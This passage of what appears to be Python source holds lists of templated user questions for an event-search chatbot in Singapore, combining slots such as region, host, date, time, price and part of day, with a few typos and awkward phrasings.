"What events are {event_host} organising in the {region} region of Singapore?",
"What events in the {region} are {event_host} organising?",
"What events in the {region} area are {event_host} organising?",
"What events in the {region} region are {event_host} organising?",
"What events in the {region} region of Singapore are {event_host} organising?",
"Which event in the {region} is {event_host} an organiser of?",
"Which event in the {region} region is {event_host} an organiser of?",
"Which event in the {region} area is {event_host} an organiser of?",
"Which event in the {region} of Singapore is {event_host} an organiser of?",
"Which event is {event_host} an organiser of in the {region}?",
"Which event is {event_host} an organiser of in the {region} region?",
"Which event is {event_host} an organiser of in the {region} area?",
"Which event is {event_host} an organiser of in the {region} of Singapore?",
"Are there any events in the {region} by the group {event_host}?",
"Are there any events in the {region} region by the group {event_host}?",
"Are there any events in the {region} area by the group {event_host}?",
"Are there any events in the {region} area of Singapore by the group {event_host}?",
"Are there any events in the {region} of Singapore by the group {event_host}?",
"Are there any events by the group {event_host} in the {region}?",
"Are there any events by the group {event_host} in the {region} region?",
"Are there any events by the group {event_host} in the {region} area?",
"Are there any events by the group {event_host} in the {region} region of Singapore?",
"Are there any events by the group {event_host} in the {region} of Singapore?",
"Is the group {event_host} organising any events in the {region}?",
"Is the group {event_host} organising any events in the {region} area?",
"Is the group {event_host} organising any events in the {region} region?",
"Is the group {event_host} organising any events in the {region} of Singapore?",
"Is the group {event_host} organising any events in the {region} region of Singapore?",
"Any events with {event_host} in the {region}?",
"Any events with {event_host} in the {region} region?",
"Any events with {event_host} in the {region} area?",
"Any events with {event_host} in the {region} of Singapore?",
"Any events in the {region} of Singapore with {event_host}?",
"Any events in the {region} area of Singapore with {event_host}?",
"Any events in the {region} area with {event_host}?",
"Any events in the {region} region with {event_host}?",
"Any events in the {region} with {event_host}?",
"Could you please recommend me some events organising by {event_host} in the {region}?",
"Could you please recommend me some events organising by {event_host} in the {region} region?",
"Could you please recommend me some events organising by {event_host} in the {region} area?",
"Could you please recommend me some events organising by {event_host} in the {region} of Singapore?",
"Could you please recommend me some events organising by {event_host} in the {region} area of Singapore?",
"Could you please recommend me some events organising by {event_host} in the {region} region of Singapore?",
"Could you please recommend me some events in the {region} organising by {event_host}?",
"Could you please recommend me some events in the {region} region organising by {event_host}?",
"Could you please recommend me some events in the {region} area organising by {event_host}?",
"Could you please recommend me some events in the {region} of Singapore organising by {event_host}?",
"Could you please recommend me some events in the {region} area of Singapore organising by {event_host}?",
"Could you please recommend me some events in the {region} region of Singapore organising by {event_host}?",
"Can you tell me events by {event_host} in the {region}?",
"Can you tell me events by {event_host} in the {region} region?",
"Can you tell me events by {event_host} in the {region} area?",
"Can you tell me events by {event_host} in the {region} of Singapore?",
"Can you tell me events in the {region} by {event_host}?",
"Can you tell me events in the {region} region by {event_host}?",
"Can you tell me events in the {region} area by {event_host}?",
"Can you tell me events in the {region} of Singapore by {event_host}?"
]
inform_region_and_date_start_template = [
"I want to know what events are occurring on {date_start} in the {region}.",
"I want to know what events are occurring on {date_start} in the {region} region.",
"I want to know what events are occurring on {date_start} in the {region} area.",
"I want to know what events are occurring on {date_start} in the {region} region of Singapore.",
"I want to know what events are occurring on {date_start} in the {region} of Singapore.",
"I want to know what events in the {region} are occurring on {date_start}.",
"I want to know what events in the {region} region are occurring on {date_start}.",
"I want to know what events in the {region} area are occurring on {date_start}.",
"I want to know what events in the {region} area of Singapore are occurring on {date_start}.",
"I want to know what events in the {region} of Singapore are occurring on {date_start}.",
"Are there any events on {date_start} in the {region}?",
"Are there any events on {date_start} in the {region} area?",
"Are there any events on {date_start} in the {region} region?",
"Are there any events on {date_start} in the {region} area of Singapore?",
"Are there any events on {date_start} in the {region} region of Singapore?",
"Are there any events on {date_start} in the {region} of Singapore?",
"Are there any events in the {region} on {date_start}?",
"Are there any events in the {region} area on {date_start}?",
"Are there any events in the {region} region on {date_start}?",
"Are there any events in the {region} area of Singapore on {date_start}?",
"Are there any events in the {region} region of Singapore on {date_start}?",
"Are there any events in the {region} of Singapore on {date_start}?",
"What events are on {date_start} in the {region}?",
"What events are on {date_start} in the {region} area?",
"What events are on {date_start} in the {region} region?",
"What events are on {date_start} in the {region} of Singapore?",
"What events are on {date_start} in the {region} region of Singapore?",
"What events in the {region} are on {date_start}?",
"What events in the {region} area are on {date_start}?",
"What events in the {region} region are on {date_start}?",
"What events in the {region} of Singapore are on {date_start}?",
"What events in the {region} region of Singapore are on {date_start}?",
"Does {date_start} have events in the {region} I can attend?",
"Does {date_start} have events in the {region} region I can attend?",
"Does {date_start} have events in the {region} area I can attend?",
"Does {date_start} have events in the {region} of Singapore I can attend?",
"Does {date_start} have events in the {region} area of Singapore I can attend?",
"Will there be any events on {date_start} in the {region}?",
"Will there be any events on {date_start} in the {region} region?",
"Will there be any events on {date_start} in the {region} area?",
"Will there be any events on {date_start} in the {region} region of Singapore?",
"Will there be any events on {date_start} in the {region} of Singapore?",
"Will there be any events in the {region} on {date_start}?",
"Will there be any events in the {region} region on {date_start}?",
"Will there be any events in the {region} area on {date_start}?",
"Will there be any events in the {region} area of Singapore on {date_start}?",
"Will there be any events in the {region} of Singapore on {date_start}?",
"Can you recommend me some events on {date_start} in the {region}?",
"Can you recommend me some events on {date_start} in the {region} region?",
"Can you recommend me some events on {date_start} in the {region} area?",
"Can you recommend me some events on {date_start} in the {region} of Singapore?",
"Can you recommend me some events on {date_start} in the {region} region of Singapore?",
"Can you recommend me some events in the {region} on {date_start}?",
"Can you recommend me some events in the {region} region on {date_start}?",
"Can you recommend me some events in the {region} area on {date_start}?",
"Can you recommend me some events in the {region} of Singapore on {date_start}?",
"Can you recommend me some events in the {region} area of Singapore on {date_start}?",
"Do you kow any events holding on {date_start} in the {region}?",
"Do you kow any events holding on {date_start} in the {region} region?",
"Do you kow any events holding on {date_start} in the {region} area?",
"Do you kow any events holding on {date_start} in the {region} region of Singapore?",
"Do you kow any events holding on {date_start} in the {region} of Singapore?",
"Do you kow any events holding on {date_start} in the {region} area of Singapore?",
"Do you kow any events holding in the {region} on {date_start}?",
"Do you kow any events holding in the {region} region on {date_start}?",
"Do you kow any events holding in the {region} area on {date_start}?",
"Do you kow any events holding in the {region} region of Singapore on {date_start}?",
"Do you kow any events holding in the {region} of Singapore on {date_start}?",
"Do you kow any events holding in the {region} area of Singapore on {date_start}?",
"Do you have any suggestions on events on {date_start} in the {region}?",
"Do you have any suggestions on events on {date_start} in the {region} region?",
"Do you have any suggestions on events on {date_start} in the {region} area?",
"Do you have any suggestions on events on {date_start} in the {region} of Singapore?",
"Do you have any suggestions on events on {date_start} in the {region} region of Singapore?",
"Do you have any suggestions on events in the {region} on {date_start}?",
"Do you have any suggestions on events in the {region} region on {date_start}?",
"Do you have any suggestions on events in the {region} area on {date_start}?",
"Do you have any suggestions on events in the {region} of Singapore on {date_start}?",
"Do you have any suggestions on events in the {region} area of Singapore on {date_start}?"
]
inform_region_and_time_template = [
"I would like to know about events that are around {time} in the {region}.",
"I would like to know about events that are around {time} in the {region} region.",
"I would like to know about events that are around {time} in the {region} area.",
"I would like to know about events that are around {time} in the {region} of Singapore.",
"I would like to know about events that are around {time} in the {region} region of Singapore.",
"I would like to know about events in the {region} that are around {time}.",
"I would like to know about events in the {region} region that are around {time}.",
"I would like to know about events in the {region} area that are around {time}.",
"I would like to know about events in the {region} of Singapore that are around {time}.",
"I would like to know about events in the {region} region of Singapore that are around {time}.",
"Are there any events that start at {time} in the {region}?",
"Are there any events that start at {time} in the {region} area?",
"Are there any events that start at {time} in the {region} region?",
"Are there any events that start at {time} in the {region} of Singapore?",
"Are there any events that start at {time} in the {region} area of Singapore?",
"Are there any events that start at {time} in the {region} region of Singapore?",
"Are there any events in the {region} that start at {time}?",
"Are there any events in the {region} area that start at {time}?",
"Are there any events in the {region} region that start at {time}?",
"Are there any events in the {region} of Singapore that start at {time}?",
"Are there any events in the {region} area of Singapore that start at {time}?",
"Are there any events in the {region} region of Singapore that start at {time}?",
"Tell me about events around {time} in the {region}.",
"Tell me about events around {time} in the {region} region.",
"Tell me about events around {time} in the {region} area.",
"Tell me about events around {time} in the {region} of Singapore.",
"Tell me about events around {time} in the {region} region of Singapore.",
"Tell me about events in the {region} around {time}.",
"Tell me about events in the {region} region around {time}.",
"Tell me about events in the {region} area around {time}.",
"Tell me about events in the {region} of Singapore around {time}.",
"Tell me about events in the {region} region of Singapore around {time}.",
"Will there be any events around {time} in the {region}?",
"Will there be any events around {time} in the {region} region?",
"Will there be any events around {time} in the {region} area?",
"Will there be any events around {time} in the {region} of Singapore?",
"Will there be any events around {time} in the {region} region of Singapore?",
"Will there be any events around {time} in the {region} area of Singapore?",
"Will there be any events in the {region} around {time}?",
"Will there be any events in the {region} region around {time}?",
"Will there be any events in the {region} area around {time}?",
"Will there be any events in the {region} of Singapore around {time}?",
"Will there be any events in the {region} region of Singapore around {time}?",
"Will there be any events in the {region} area of Singapore around {time}?",
"I want to know if there are events at {time} in the {region}?",
"I want to know if there are events at {time} in the {region} region?",
"I want to know if there are events at {time} in the {region} area?",
"I want to know if there are events at {time} in the {region} of Singapore?",
"I want to know if there are events at {time} in the {region} region of Singapore?",
"I want to know if there are events at {time} in the {region} area of Singapore?",
"I want to know if there are events in the {region} at {time}?",
"I want to know if there are events in the {region} region at {time}?",
"I want to know if there are events in the {region} area at {time}?",
"I want to know if there are events in the {region} of Singapore at {time}?",
"I want to know if there are events in the {region} region of Singapore at {time}?",
"I want to know if there are events in the {region} area of Singapore at {time}?",
"Do you know any events start at {time} in the {region}?",
"Do you know any events start at {time} in the {region} region?",
"Do you know any events start at {time} in the {region} area?",
"Do you know any events start at {time} in the {region} of Singapore?",
"Do you know any events start at {time} in the {region} region of Singapore?",
"Do you know any events start at {time} in the {region} area of Singapore?",
"Do you know any events in the {region} start at {time}?",
"Do you know any events in the {region} region start at {time}?",
"Do you know any events in the {region} area start at {time}?",
"Do you know any events in the {region} of Singapore start at {time}?",
"Do you know any events in the {region} region of Singapore start at {time}?",
"Do you know any events in the {region} area of Singapore start at {time}?",
"Can you recommend any event begins around {time} in the {region}?",
"Can you recommend any event begins around {time} in the {region} region?",
"Can you recommend any event begins around {time} in the {region} area?",
"Can you recommend any event begins around {time} in the {region} of Singapore?",
"Can you recommend any event begins around {time} in the {region} area of Singapore?",
"Can you recommend any event in the {region} begins around {time}?",
"Can you recommend any event in the {region} region begins around {time}?",
"Can you recommend any event in the {region} area begins around {time}?",
"Can you recommend any event in the {region} of Singapore begins around {time}?",
"Can you recommend any event in the {region} region of Singapore begins around {time}?",
"Can I know some events at around {time} in the {region}?",
"Can I know some events at around {time} in the {region} region?",
"Can I know some events at around {time} in the {region} area?",
"Can I know some events at around {time} in the {region} of Singapore?",
"Can I know some events at around {time} in the {region} region of Singapore?",
"Can I know some events at around {time} in the {region} area of Singapore?",
"Can I know some events in the {region} at around {time}?",
"Can I know some events in the {region} region at around {time}?",
"Can I know some events in the {region} area at around {time}?",
"Can I know some events in the {region} of Singapore at around {time}?",
"Can I know some events in the {region} region of Singapore at around {time}?",
"Can I know some events in the {region} area of Singapore at around {time}?"
]
inform_region_and_price_template = [
"I would like to know about events that are around {price} dollars in the {region}.",
"I would like to know about events that are around {price} dollar in the {region} region.",
"I would like to know about events that are around {price} SGD in the {region} area.",
"I would like to know about events that are around ${price} in the {region} of Singapore.",
"I would like to know about events that are around {price} dollars in the {region} region of Singapore.",
"I would like to know about events that are around {price} dollar in the {region} area of Singapore.",
"I would like to know about events in the {region} that are around {price} SGD.",
"I would like to know about events in the {region} region that are around {price} SGD.",
"I would like to know about events in the {region} area that are around {price} dollar.",
"I would like to know about events in the {region} of Singapore that are around {price} dollars.",
"I would like to know about events in the {region} region of Singapore that are around {price} SGD.",
"I would like to know about events in the {region} area of Singapore that are around ${price}.",
"Are there any events that start at ${price} in the {region}?",
"Are there any events that start at {price} dollar in the {region} region?",
"Are there any events that start at {price} dollars in the {region} area?",
"Are there any events that start at {price} SGD in the {region} region of Singapore?",
"Are there any events that start at ${price} in the {region} area of Singapore?",
"Are there any events that start at {price} SGD in the {region} of Singapore?",
"Are there any events in the {region} that start at {price} dollars?",
"Are there any events in the {region} region that start at {price} dollar?",
"Are there any events in the {region} area that start at ${price}?",
"Are there any events in the {region} region of Singapore that start at {price} dollars?",
"Are there any events in the {region} area of Singapore that start at {price} dollar?",
"Are there any events in the {region} of Singapore that start at {price} SGD?",
"Tell me about events around ${price} in the {region}.",
"Tell me about events around {price} dollar in the {region} region.",
"Tell me about events around {price} dollars in the {region} area.",
"Tell me about events around {price} SGD in the {region} of Singapore.",
"Tell me about events around ${price} in the {region} region of Singapore.",
"Tell me about events around {price} SGD in the {region} area of Singapore.",
"Tell me about events in the {region} dollar around {price}.",
"Tell me about events in the {region} dollars region around {price}.",
"Tell me about events in the {region} area around ${price}.",
"Tell me about events in the {region} of Singapore around ${price}.",
"Tell me about events in the {region} SGD region of Singapore around {price}.",
"Tell me about events in the {region} dollars area of Singapore around {price}.",
"Will there be any events around ${price} in the {region}?",
"Will there be any events around {price} dollar in the {region} region?",
"Will there be any events around {price} SGD in the {region} area?",
"Will there be any events around {price} dollars in the {region} of Singapore?",
"Will there be any events around ${price} in the {region} region of Singapore?",
"Will there be any events in the {region} around {price} dollars?",
"Will there be any events in the {region} region around {price} dollar?",
"Will there be any events in the {region} area around {price} SGD?",
"Will there be any events in the {region} of Singapore around ${price}?",
"Will there be any events in the {region} area of Singapore around ${price}?",
"I want to know if there are events at ${price} in the {region}?",
"I want to know if there are events at {price} SGD in the {region} region?",
"I want to know if there are events at {price} SGD in the {region} area?",
"I want to know if there are events at {price} dollars in the {region} of Singapore?",
"I want to know if there are events at {price} dollar in the {region} region of Singapore?",
"I want to know if there are events at ${price} in the {region} area of Singapore?",
"I want to know if there are events in the {region} at ${price}?",
"I want to know if there are events in the {region} region at {price} SGD?",
"I want to know if there are events in the {region} area at {price} dollars?",
"I want to know if there are events in the {region} of Singapore at {price} dollar?",
"I want to know if there are events in the {region} region of Singapore at ${price}?",
"I want to know if there are events in the {region} area of Singapore at {price} SGD?",
"Do you know any events start at {price} SGD in the {region}?",
"Do you know any events start at {price} dollars in the {region} region?",
"Do you know any events start at {price} dollar in the {region} area?",
"Do you know any events start at ${price} in the {region} of Singapore?",
"Do you know any events start at {price} SGD in the {region} region of Singapore?",
"Do you know any events in the {region} start at {price} SGD?",
"Do you know any events in the {region} region start at {price} dollar?",
"Do you know any events in the {region} area start at {price} dollars?",
"Do you know any events in the {region} of Singapore start at ${price}?",
"Do you know any events in the {region} area of Singapore start at ${price}?",
"Can you recommend any event begins around {price} SGD in the {region}?",
"Can you recommend any event begins around {price} SGD in the {region} region?",
"Can you recommend any event begins around {price} dollars in the {region} area?",
"Can you recommend any event begins around {price} dollar in the {region} of Singapore?",
"Can you recommend any event begins around ${price} in the {region} region of Singapore?",
"Can you recommend any event begins around ${price} in the {region} area of Singapore?",
"Can you recommend any event in the {region} begins around {price} dollar?",
"Can you recommend any event in the {region} region begins around {price} dollars?",
"Can you recommend any event in the {region} area begins around {price} SGD?",
"Can you recommend any event in the {region} of Singapore begins around {price} SGD?",
"Can you recommend any event in the {region} region of Singapore begins around ${price}?",
"Can you recommend any event in the {region} area of Singapore begins around ${price}?",
"Can I know some events at around ${price} in the {region}?",
"Can I know some events at around {price} SGD in the {region} region?",
"Can I know some events at around {price} dollars in the {region} area?",
"Can I know some events at around {price} dollar in the {region} of Singapore?",
"Can I know some events at around {price} SGD in the {region} region of Singapore?",
"Can I know some events at around ${price} in the {region} area of Singapore?",
"Can I know some events in the {region} at around {price} SGD?",
"Can I know some events in the {region} region at around {price} dollars?",
"Can I know some events in the {region} area at around {price} dollar?",
"Can I know some events in the {region} of Singapore at around ${price}?",
"Can I know some events in the {region} region of Singapore at around ${price}?",
"Can I know some events in the {region} area of Singapore at around {price} SGD?"
]
inform_region_and_is_weekend_template = [
"Tell me about events that on {is_weekend} in the {region}.",
"Tell me about events that on {is_weekend} in the {region} region.",
"Tell me about events that on {is_weekend} in the {region} area.",
"Tell me about events that on {is_weekend} in the {region} of Singapore.",
"Tell me about events that on {is_weekend} in the {region} region of Singapore.",
"Tell me about events that on {is_weekend} in the {region} area of Singapore.",
"Tell me about events in the {region} that on {is_weekend}.",
"Tell me about events in the {region} region that on {is_weekend}.",
"Tell me about events in the {region} area that on {is_weekend}.",
"Tell me about events in the {region} of Singapore that on {is_weekend}.",
"Tell me about events in the {region} region of Singapore that on {is_weekend}.",
"Tell me about events in the {region} area of Singapore that on {is_weekend}.",
"Which events take place on {is_weekend} in the {region}.",
"Which events take place on {is_weekend} in the {region} region.",
"Which events take place on {is_weekend} in the {region} area.",
"Which events take place on {is_weekend} in the {region} of Singapore.",
"Which events take place on {is_weekend} in the {region} region of Singapore.",
"Which events take place on {is_weekend} in the {region} area of Singapore.",
"Which events in the {region} take place on {is_weekend}.",
"Which events in the {region} region take place on {is_weekend}.",
"Which events in the {region} area take place on {is_weekend}.",
"Which events in the {region} of Singapore take place on {is_weekend}.",
"Which events in the {region} region of Singapore take place on {is_weekend}.",
"Which events in the {region} area of Singapore take place on {is_weekend}.",
"I would like to find an event that is on {is_weekend} in the {region}.",
"I would like to find an event that is on {is_weekend} in the {region} region.",
"I would like to find an event that is on {is_weekend} in the {region} area.",
"I would like to find an event that is on {is_weekend} in the {region} of Singapore.",
"I would like to find an event that is on {is_weekend} in the {region} region of Singapore.",
"I would like to find an event that is on {is_weekend} in the {region} area of Singapore.",
"I would like to find an event in the {region} that is on {is_weekend}.",
"I would like to find an event in the {region} region that is on {is_weekend}.",
"I would like to find an event in the {region} area that is on {is_weekend}.",
"I would like to find an event in the {region} of Singapore that is on {is_weekend}.",
"I would like to find an event in the {region} region of Singapore that is on {is_weekend}.",
"I would like to find an event in the {region} area of Singapore that is on {is_weekend}.",
"What events are conducted on {is_weekend} in the {region}.",
"What events are conducted on {is_weekend} in the {region} region.",
"What events are conducted on {is_weekend} in the {region} area.",
"What events are conducted on {is_weekend} in the {region} of Singapore.",
"What events are conducted on {is_weekend} in the {region} region of Singapore.",
"What events are conducted on {is_weekend} in the {region} area of Singapore.",
"What events in the {region} are conducted on {is_weekend}.",
"What events in the {region} region are conducted on {is_weekend}.",
"What events in the {region} area are conducted on {is_weekend}.",
"What events in the {region} of Singapore are conducted on {is_weekend}.",
"What events in the {region} region of Singapore are conducted on {is_weekend}.",
"What events in the {region} area of Singapore are conducted on {is_weekend}.",
"Will there be events that take place on {is_weekend} in the {region}?",
"Will there be events that take place on {is_weekend} in the {region} region?",
"Will there be events that take place on {is_weekend} in the {region} area?",
"Will there be events that take place on {is_weekend} in the {region} of Singapore?",
"Will there be events that take place on {is_weekend} in the {region} region of Singapore?",
"Will there be events that take place on {is_weekend} in the {region} area of Singapore?",
"Will there be events in the {region} that take place on {is_weekend}?",
"Will there be events in the {region} region that take place on {is_weekend}?",
"Will there be events in the {region} area that take place on {is_weekend}?",
"Will there be events in the {region} of Singapore that take place on {is_weekend}?",
"Will there be events in the {region} region of Singapore that take place on {is_weekend}?",
"Will there be events in the {region} area of Singapore that take place on {is_weekend}?",
"I want to know the events that are available on {is_weekend} in the {region}.",
"I want to know the events that are available on {is_weekend} in the {region} region.",
"I want to know the events that are available on {is_weekend} in the {region} area.",
"I want to know the events that are available on {is_weekend} in the {region} of Singapore.",
"I want to know the events that are available on {is_weekend} in the {region} region of Singapore.",
"I want to know the events that are available in the {region} on {is_weekend}.",
"I want to know the events that are available in the {region} region on {is_weekend}.",
"I want to know the events that are available in the {region} area on {is_weekend}.",
"I want to know the events that are available in the {region} of Singapore on {is_weekend}.",
"I want to know the events that are available in the {region} area of Singapore on {is_weekend}.",
"Can you recommend some events on {is_weekend} in the {region}?",
"Can you recommend some events on {is_weekend} in the {region} region?",
"Can you recommend some events on {is_weekend} in the {region} area?",
"Can you recommend some events on {is_weekend} in the {region} of Singapore?",
"Can you recommend some events on {is_weekend} in the {region} region of Singapore?",
"Can you recommend some events on {is_weekend} in the {region} area of Singapore?",
"Can you recommend some events in the {region} on {is_weekend}?",
"Can you recommend some events in the {region} region on {is_weekend}?",
"Can you recommend some events in the {region} area on {is_weekend}?",
"Can you recommend some events in the {region} of Singapore on {is_weekend}?",
"Can you recommend some events in the {region} region of Singapore on {is_weekend}?",
"Can you recommend some events in the {region} area of Singapore on {is_weekend}?",
"Do you have any suggestions on events on {is_weekend} in the {region}?",
"Do you have any suggestions on events on {is_weekend} in the {region} region?",
"Do you have any suggestions on events on {is_weekend} in the {region} area?",
"Do you have any suggestions on events on {is_weekend} in the {region} of Singapore?",
"Do you have any suggestions on events on {is_weekend} in the {region} region of Singapore?",
"Do you have any suggestions on events on {is_weekend} in the {region} area of Singapore?",
"Do you have any suggestions on events in the {region} on {is_weekend}?",
"Do you have any suggestions on events in the {region} region on {is_weekend}?",
"Do you have any suggestions on events in the {region} area on {is_weekend}?",
"Do you have any suggestions on events in the {region} of Singapore on {is_weekend}?",
"Do you have any suggestions on events in the {region} region of Singapore on {is_weekend}?",
"Do you have any suggestions on events in the {region} area of Singapore on {is_weekend}?",
"I want to find some events on {is_weekend} in the {region}.",
"I want to find some events on {is_weekend} in the {region} region.",
"I want to find some events on {is_weekend} in the {region} area.",
"I want to find some events on {is_weekend} in the {region} of Singapore.",
"I want to find some events on {is_weekend} in the {region} region of Singapore.",
"I want to find some events on {is_weekend} in the {region} area of Singapore.",
"I want to find some events in the {region} on {is_weekend}.",
"I want to find some events in the {region} region on {is_weekend}.",
"I want to find some events in the {region} area on {is_weekend}.",
"I want to find some events in the {region} of Singapore on {is_weekend}.",
"I want to find some events in the {region} region of Singapore on {is_weekend}.",
"I want to find some events in the {region} area of Singapore on {is_weekend}."
]
inform_region_and_part_of_day_template = [
"Tell me about events that are in {part_of_day} in the {region}.",
"Tell me about events that are in {part_of_day} in the {region} region.",
"Tell me about events that are in {part_of_day} in the {region} area.",
"Tell me about events that are in {part_of_day} in the {region} of Singapore.",
"Tell me about events that are in {part_of_day} in the {region} region of Singapore.",
"Tell me about events that are in {part_of_day} in the {region} area of Singapore.",
"Tell me about events that are in the {region} in {part_of_day}.",
"Tell me about events that are in the {region} region in {part_of_day}.",
"Tell me about events that are in the {region} area in {part_of_day}.",
"Tell me about events that are in the {region} of Singapore in {part_of_day}.",
"Tell me about events that are in the {region} region of Singapore in {part_of_day}.",
"Tell me about events that are in the {region} area of Singapore in {part_of_day}.",
"Which events take place on {part_of_day} in the {region}.",
"Which events take place on {part_of_day} in the {region} region.",
"Which events take place on {part_of_day} in the {region} area.",
"Which events take place on {part_of_day} in the {region} of Singapore.",
"Which events take place on {part_of_day} in the {region} region of Singapore.",
"Which events take place on {part_of_day} in the {region} are of Singapore.",
"Which events in the {region} take place on {part_of_day}.",
"Which events in the {region} region take place on {part_of_day}.",
"Which events in the {region} area take place on {part_of_day}.",
"Which events in the {region} of Singapore take place on {part_of_day}.",
"Which events in the {region} region of Singapore take place on {part_of_day}.",
"Which events in the {region} are of Singapore take place on {part_of_day}.",
"I would like to find an event in the {region} that is in {part_of_day}.",
"I would like to find an event in the {region} region that is in {part_of_day}.",
"I would like to find an event in the {region} area that is in {part_of_day}.",
"I would like to find an event in the {region} of Singapore that is in {part_of_day}.",
"I would like to find an event in the {region} region of Singapore that is in {part_of_day}.",
"I would like to find an event in the {region} area of Singapore that is in {part_of_day}.",
"What events are conducted on {part_of_day} in the {region}.",
"What events are conducted on {part_of_day} in the {region} region.",
"What events are conducted on {part_of_day} in the {region} area.",
"What events are conducted on {part_of_day} in the {region} of Singapore.",
"What events are conducted on {part_of_day} in the {region} region of Singapore.",
"What events are conducted on {part_of_day} in the {region} area of Singapore.",
"What events in the {region} are conducted on {part_of_day}.",
"What events in the {region} region are conducted on {part_of_day}.",
"What events in the {region} area are conducted on {part_of_day}.",
"What events in the {region} of Singapore are conducted on {part_of_day}.",
"What events in the {region} region of Singapore are conducted on {part_of_day}.",
"What events in the {region} area of Singapore are conducted on {part_of_day}.",
"Will there be events in the {region} that take place in {part_of_day}?",
"Will there be events in the {region} region that take place in {part_of_day}?",
"Will there be events in the {region} area that take place in {part_of_day}?",
"Will there be events in the {region} of Singapore that take place in {part_of_day}?",
"Will there be events in the {region} region of Singapore that take place in {part_of_day}?",
"Will there be events in the {region} area of Singapore that take place in {part_of_day}?",
"Will there be events that take place in {part_of_day} in the {region}?",
"Will there be events that take place in {part_of_day} in the {region} region?",
"Will there be events that take place in {part_of_day} in the {region} area?",
"Will there be events that take place in {part_of_day} in the {region} of Singapore?",
"Will there be events that take place in {part_of_day} in the {region} region of Singapore?",
"Will there be events that take place in {part_of_day} in the {region} area of Singapore?",
"I want to know the events that are available at {part_of_day} in the {region}.",
"I want to know the events that are available at {part_of_day} in the {region} region.",
"I want to know the events that are available at {part_of_day} in the {region} area.",
"I want to know the events that are available at {part_of_day} in the {region} of Singapore.",
"I want to know the events that are available at {part_of_day} in the {region} region of Singapore.",
"I want to know the events that are available at {part_of_day} in the {region} area of Singapore.",
"I want to know the events in the {region} that are available at {part_of_day}.",
"I want to know the events in the {region} region that are available at {part_of_day}.",
"I want to know the events in the {region} area that are available at {part_of_day}.",
"I want to know the events in the {region} of Singapore that are available at {part_of_day}.",
"I want to know the events in the {region} region of Singapore that are available at {part_of_day}.",
"I want to know the events in the {region} area of Singapore that are available at {part_of_day}.",
"Can you recommend some events start at {part_of_day} in the {region}?",
"Can you recommend some events start at {part_of_day} in the {region} region?",
"Can you recommend some events start at {part_of_day} in the {region} area?",
"Can you recommend some events start at {part_of_day} in the {region} of Singapore?",
"Can you recommend some events start at {part_of_day} in the {region} region of Singapore?",
"Can you recommend some events in the {region} start at {part_of_day}?",
"Can you recommend some events in the {region} region start at {part_of_day}?",
"Can you recommend some events in the {region} area start at {part_of_day}?",
"Can you recommend some events in the {region} of Singapore start at {part_of_day}?",
"Can you recommend some events in the {region} area of Singapore start at {part_of_day}?",
"Do you know any events begins in {part_of_day} in the {region}?",
"Do you know any events begins in {part_of_day} in the {region} region?",
"Do you know any events begins in {part_of_day} in the {region} area?",
"Do you know any events begins in {part_of_day} in the {region} of Singapore?",
"Do you know any events begins in {part_of_day} in the {region} region of Singapore?",
"Do you know any events begins in {part_of_day} in the {region} area of Singapore?",
"Do you know any events in the {region} that begins in {part_of_day}?",
"Do you know any events in the {region} region that begins in {part_of_day}?",
"Do you know any events in the {region} area that begins in {part_of_day}?",
"Do you know any events in the {region} of Singapore that begins in {part_of_day}?",
"Do you know any events in the {region} region of Singapore that begins in {part_of_day}?",
"Do you know any events in the {region} area of Singapore that begins in {part_of_day}?",
"Do you have any suggestions on events in {part_of_day} in the {region}?",
"Do you have any suggestions on events in {part_of_day} in the {region} region?",
"Do you have any suggestions on events in {part_of_day} in the {region} area?",
"Do you have any suggestions on events in {part_of_day} in the {region} of Singapore?",
"Do you have any suggestions on events in {part_of_day} in the {region} region of Singapore?",
"Do you have any suggestions on events in the {region} in {part_of_day}?",
"Do you have any suggestions on events in the {region} region in {part_of_day}?",
"Do you have any suggestions on events in the {region} area in {part_of_day}?",
"Do you have any suggestions on events in the {region} of Singapore in {part_of_day}?",
"Do you have any suggestions on events in the {region} area of Singapore in {part_of_day}?",
"I want to find some events in {part_of_day} in the {region}.",
"I want to find some events in {part_of_day} in the {region} region.",
"I want to find some events in {part_of_day} in the {region} area.",
"I want to find some events in {part_of_day} in the {region} of Singapore.",
"I want to find some events in {part_of_day} in the {region} region of Singapore.",
"I want to find some events in {part_of_day} in the {region} area of Singapore.",
"I want to find some events in the {region} in {part_of_day}.",
"I want to find some events in the {region} region in {part_of_day}.",
"I want to find some events in the {region} area in {part_of_day}.",
"I want to find some events in the {region} of Singapore in {part_of_day}.",
"I want to find some events in the {region} region of Singapore in {part_of_day}.",
"I want to find some events in the {region} area of Singapore in {part_of_day}."
]
inform_event_host_and_date_start_template = [
"Are there events by {event_host} occuring on {date_start}?",
"Are there events by {event_host} on {date_start}?",
"Are there events occurring on {date_start} by {event_host}?",
"Are there events on {date_start} by {event_host}?",
"What events would be organised by {event_host} occurring on {date_start}?",
"What events would be organised by {event_host} on {date_start}?",
"What events on {date_start} would be organised by {event_host}?",
"What events occurring on {date_start} would be organised by {event_host}?",
"Is {event_host} organising any events on {date_start}?",
"What events are {event_host} organising on {date_start}?",
"What events on {date_start} are {event_host} organising?",
"Which event is {event_host} an organiser of on {date_start}?",
"Which event on {date_start} is {event_host} an organiser of?",
"Which event occurring on {date_start} is {event_host} an organiser of?",
"Are there any events by the group {event_host} on {date_start}?",
"Are there any events by the group {event_host} occurring on {date_start}?",
"Are there any events on {date_start} by the group {event_host}?",
"Are there any events occurring on {date_start} by the group {event_host}?",
"Is the group {event_host} organising any events on {date_start}?",
"Any events with {event_host} on {date_start}?",
"Any events on {date_start} with {event_host}?",
"Could you please recommend me some events organising by {event_host} on {date_start}?",
"Could you please recommend me some events on {date_start} organising by {event_host}?",
"Can you tell me events by {event_host} on {date_start}?",
"Can you tell me events on {date_start} by {event_host}?"
]
inform_event_host_and_time_template = [
"I would like to know about events that are around {time} organised by {event_host}.",
"I would like to know about events that are around {time} by {event_host}.",
"I would like to know about events organised by {event_host} that are around {time}.",
"I would like to know about events by {event_host} that are around {time}.",
"Are there any events that start at {time} organised by {event_host}?",
"Are there any events that start at {time} by {event_host}?",
"Are there any events organised by {event_host} that start at {time}?",
"Are there any events by {event_host} that start at {time}?",
"Tell me about events organised by {event_host}, around {time}.",
"Tell me about events by {event_host}, around {time}.",
"Tell me about events around {time} organised by {event_host}.",
"Tell me about events around {time} by {event_host}.",
"Will there be any events around {time} organised by {event_host}?",
"Will there be any events around {time} by {event_host}?",
"Will there be any events organised by {event_host} around {time}?",
"Will there be any events by {event_host} around {time}?",
"I want to know if there are events at {time} organised by {event_host}?",
